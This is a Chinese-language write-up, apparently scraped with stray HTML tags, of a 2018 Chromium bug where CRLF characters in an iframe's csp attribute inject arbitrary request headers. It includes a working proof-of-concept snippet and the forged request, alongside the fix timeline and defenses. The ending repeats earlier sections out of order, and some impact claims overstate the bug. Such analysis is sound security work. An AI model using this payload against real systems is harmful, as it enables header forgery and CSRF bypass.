Chromium CRLF注入漏洞分析与利用<\/h1>

漏洞概述<\/h2>
本文详细分析Chromium浏览器中的一个安全漏洞（CVE-2018-xxxx），该漏洞允许攻击者通过CRLF注入技术在跨域请求中设置任意HTTP头部。该漏洞由安全研究人员在2018年发现并报告，影响当时版本的Chromium浏览器。<\/p>

漏洞背景<\/h2>

CRLF注入简介<\/h3>
CRLF（Carriage Return Line Feed）注入是一种Web安全漏洞，攻击者通过注入特殊字符（`\r\n<\/code>）来控制HTTP请求或响应的头部或主体。在HTTP协议中，\r\n<\/code>用于分隔头部字段和请求主体。<\/p>`

漏洞发现<\/h3>
研究人员在iframe元素的csp<\/code>属性中发现了一个可利用点，该属性本应用于指定内容安全策略(CSP)，但由于缺乏适当的输入过滤，导致了CRLF注入的可能性。<\/p>
技术细节<\/h2>
iframe的csp属性机制<\/h3>
当为iframe元素设置src<\/code>属性时，浏览器会生成包含Sec-Required-CSP<\/code>头部的HTTP请求：<\/p>
GET<\/span> \/ HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> www.google.com<\/span>
<\/span><\/span>upgrade-insecure-requests:<\/span> 1<\/span>
<\/span><\/span>sec-required-csp:<\/span> script-src google.com<\/span>
<\/span><\/span>user-agent:<\/span> Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/66.0.3359.181 Safari\/537.36<\/span>
<\/span><\/span>accept:<\/span> text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8<\/span>
<\/span><\/span>accept-encoding:<\/span> gzip, deflate, br<\/span>
<\/span><\/span>accept-language:<\/span> pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7<\/span>
<\/span><\/span>cookie:<\/span> [...]<\/span>
<\/span><\/span><\/code><\/pre>Sec-Required-CSP<\/code>头部用于要求嵌入的内容符合特定的CSP策略，如果不符合，页面将不会被渲染。<\/p>
漏洞利用方法<\/h3>
通过构造特殊的csp<\/code>属性值，可以注入CRLF字符并添加任意HTTP头部：<\/p>
<!doctype html><\/span>
<\/span><\/span><meta<\/span> charset<\/span>=<\/span>utf-8<\/span>>
<\/span><\/span><script<\/span>>
<\/span><\/span>const<\/span> ifr<\/span> =<\/span> document.createElement<\/span>('iframe'<\/span>);
<\/span><\/span>ifr<\/span>.src<\/span> =<\/span> 'http:\/\/bntk.pl\/'<\/span>;
<\/span><\/span>ifr<\/span>.csp<\/span> =<\/span> 'script-src**\r\nX-CSRF-Token: 1234\r\nUser-Agent: Firefox\r\nCookie: abc\r\nHost: absolutely-random-host.google**'<\/span>;
<\/span><\/span>document.body<\/span>.appendChild<\/span>(ifr<\/span>);
<\/span><\/span><\/script<\/span>>
<\/span><\/span><\/code><\/pre>这将生成如下恶意请求：<\/p>
GET<\/span> \/ HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> absolutely-random-host.google<\/span>
<\/span><\/span>Connection:<\/span> keep-alive<\/span>
<\/span><\/span>Upgrade-Insecure-Requests:<\/span> 1<\/span>
<\/span><\/span>Sec-Required-CSP:<\/span> script-src<\/span>
<\/span><\/span>X-CSRF-Token:<\/span> 1234<\/span>
<\/span><\/span>User-Agent:<\/span> Firefox<\/span>
<\/span><\/span>Cookie:<\/span> abc<\/span>
<\/span><\/span>Accept:<\/span> text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8<\/span>
<\/span><\/span>Accept-Encoding:<\/span> gzip, deflate<\/span>
<\/span><\/span>Accept-Language:<\/span> pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7<\/span>
<\/span><\/span><\/code><\/pre>可注入的敏感头部<\/h3>
攻击者可以注入多种敏感HTTP头部，包括但不限于：<\/p>

X-CSRF-Token<\/code>：绕过CSRF保护<\/li>
User-Agent<\/code>：伪装请求来源<\/li>
Cookie<\/code>：设置任意cookie<\/li>
Host<\/code>：修改请求目标主机<\/li>
Referer<\/code>：伪造来源页面<\/li>
<\/ul>
漏洞危害<\/h2>

CSRF保护绕过<\/strong>：通过注入有效的X-CSRF-Token<\/code>头部，绕过网站的CSRF保护机制。<\/li>
会话劫持<\/strong>：通过注入Cookie<\/code>头部，劫持其他用户的会话。<\/li>
请求伪造<\/strong>：修改Host<\/code>头部，将请求重定向到攻击者控制的服务器。<\/li>
安全机制绕过<\/strong>：许多安全措施（如CORS、CSRF保护等）依赖HTTP头部进行验证，可被此漏洞绕过。<\/li>
<\/ol>
防御措施<\/h2>
浏览器厂商修复<\/h3>
Chromium团队在收到报告后迅速修复了该漏洞：<\/p>

5月23日：报告漏洞<\/li>
5月25日：修复漏洞<\/li>
6月06日：稳定版Chrome发布修复<\/li>
6月20日：披露漏洞详情<\/li>
<\/ul>
修复方法包括对csp<\/code>属性值进行严格的输入验证，过滤CRLF特殊字符。<\/p>
Web开发者防护<\/h3>

服务器端验证<\/strong>：不依赖客户端提供的HTTP头部进行安全决策。<\/li>
严格的CSP策略<\/strong>：实施严格的内容安全策略，限制iframe的使用。<\/li>
输入过滤<\/strong>：对所有用户提供的输入进行CRLF字符过滤。<\/li>
HTTPS强制使用<\/strong>：使用HSTS策略强制HTTPS连接。<\/li>
<\/ol>
总结<\/h2>
该漏洞展示了即使在现代浏览器中，简单的输入验证缺失也可能导致严重的安全问题。通过iframe的csp<\/code>属性实现CRLF注入，攻击者能够完全控制HTTP请求头部，绕过多种安全机制。浏览器厂商和Web开发者都应从中吸取教训，加强对用户输入的验证和过滤。<\/p>

Chromium CRLF注入漏洞分析与利用<\/h1>

漏洞概述<\/h2> 本文详细分析Chromium浏览器中的一个安全漏洞（CVE-2018-xxxx），该漏洞允许攻击者通过CRLF注入技术在跨域请求中设置任意HTTP头部。该漏洞由安全研究人员在2018年发现并报告，影响当时版本的Chromium浏览器。<\/p>

漏洞背景<\/h2>

CRLF注入简介<\/h3> CRLF（Carriage Return Line Feed）注入是一种Web安全漏洞，攻击者通过注入特殊字符（\r\n<\/code>）来控制HTTP请求或响应的头部或主体。在HTTP协议中，\r\n<\/code>用于分隔头部字段和请求主体。<\/p>

防御措施<\/h2>

漏洞概述<\/h2>
本文详细分析Chromium浏览器中的一个安全漏洞（CVE-2018-xxxx），该漏洞允许攻击者通过CRLF注入技术在跨域请求中设置任意HTTP头部。该漏洞由安全研究人员在2018年发现并报告，影响当时版本的Chromium浏览器。<\/p>

CRLF注入简介<\/h3>
CRLF（Carriage Return Line Feed）注入是一种Web安全漏洞，攻击者通过注入特殊字符（`\r\n<\/code>）来控制HTTP请求或响应的头部或主体。在HTTP协议中，\r\n<\/code>用于分隔头部字段和请求主体。<\/p>`